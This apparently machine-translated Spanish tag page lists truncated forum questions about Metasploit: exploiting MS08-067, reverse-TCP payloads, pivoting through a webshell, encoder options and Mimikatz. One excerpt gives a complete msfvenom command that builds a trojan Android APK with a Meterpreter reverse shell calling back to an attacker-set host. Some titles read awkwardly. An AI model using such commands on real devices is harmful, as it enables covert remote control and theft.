Preguntas con etiqueta 'metasploit'

preguntas con etiqueta
2
respuestas

Acerca de la generación de archivos Exe a partir de scripts Metasploit

Soy un novato en el framework Metasploit. Quiero crear una aplicación independiente (un archivo exe) que explote la vulnerabilidad MS08-067. ¿Es posible para mí tener la aplicación generada desde Metasploit Exploit Scripts? He leído un artícu...
hecha 06.01.2013 - 07:01
3
respuestas

Reenvío de puerto para tcp inverso

Estoy utilizando metasploit para crear una carga útil para el teléfono Android (con fines educativos). Si mi objetivo y mi computadora están en la misma red, funciona bien. Pero cuando mi objetivo está conectado a una red diferente, y usando...
hecha 15.03.2018 - 03:22
3
respuestas

Metasploit a través de webshell

Pude obtener una shell inversa php en un servidor web, por ejemplo, X que está detrás de todo tipo de cosas de seguridad perimetral. Ahora quiero apuntar a una máquina en la misma LAN con X, ¿cómo configuro metasploit para eso y configuro LHO...
hecha 27.01.2017 - 05:35
2
respuestas

Metasploit Framework: ¿Eliminar vulnerabilidades de la base de datos?

¿Es posible eliminar las vulnerabilidades en la base de datos de Metasploit Frameworks que he importado de Nexpose y Nessus? Quiero eliminar las vulnerabilidades de la base de datos mientras mantengo los servicios en la base de datos. He inte...
hecha 01.12.2016 - 08:28
1
respuesta

La exploración de la versión de SSH no se realizó correctamente para Windows XP SP2

Estaba intentando escanear la versión de SSH para Windows XP usando el "Módulo Auxiliar de Escáner SSH" en el marco de metasploit. Sin embargo, no hubo ningún error al escanear, pero no pudo identificar la versión como se muestra aquí . Lo...
hecha 20.11.2016 - 19:58
1
respuesta

¿Metasploit creando archivos .ZIP en lugar de archivos .APK?

He estado practicando con un dispositivo Android antiguo y Kali Linux. Configuré el archivo .apk troyano como de costumbre, usando el comando msfvenom -p android/meterpreter/reverse_tcp LHOST=MyIP LPORT=RandomPort R> /root/Android.apk Cr...
hecha 17.01.2017 - 10:41
1
respuesta

¿Qué significa "Rango" en msfvenom?

En la salida de pantalla a continuación de msfvenom al enumerar todos los codificadores compatibles con -l encoders ; ¿Qué significa exactamente Rango "?     
hecha 10.03.2017 - 19:53
1
respuesta

¿Codificar la carga útil de metasploit con ContextEncoding?

Usando metasploit generé un exploit exploit/windows/fileformat/ms14_017_rtf para windows 7 con windows/shell_reverse_tcp payload . En la versión avanzada, uso la opción EnableContextEncoding true y está funcionando bien. Lueg...
hecha 11.01.2016 - 16:23
1
respuesta

¿Cómo se envía un indicador de 64 metros bitómetro? [cerrado]

Todos los stagers que se envían parecen ser de 32 bits. Esto está bien, hasta que tenga que ejecutar Mimikatz, que en un sistema de 64 bits NECESITA ejecutar el mimikatz de 64 bits. Como el Mimikatz de 64 bits no se ejecuta en el medidor de 32 b...
hecha 09.03.2015 - 10:29
1
respuesta

Proxying MetaSploit a través de BurpSuite

Me preguntaba cómo podría hacer un proxy de MetaSploit a través de BurpSuite. Tenía que aplicar ingeniería inversa a un paquete que se estaba enviando a mi ChromeCast, pero no tengo forma de ver el paquete. Gracias.     
hecha 21.05.2017 - 01:40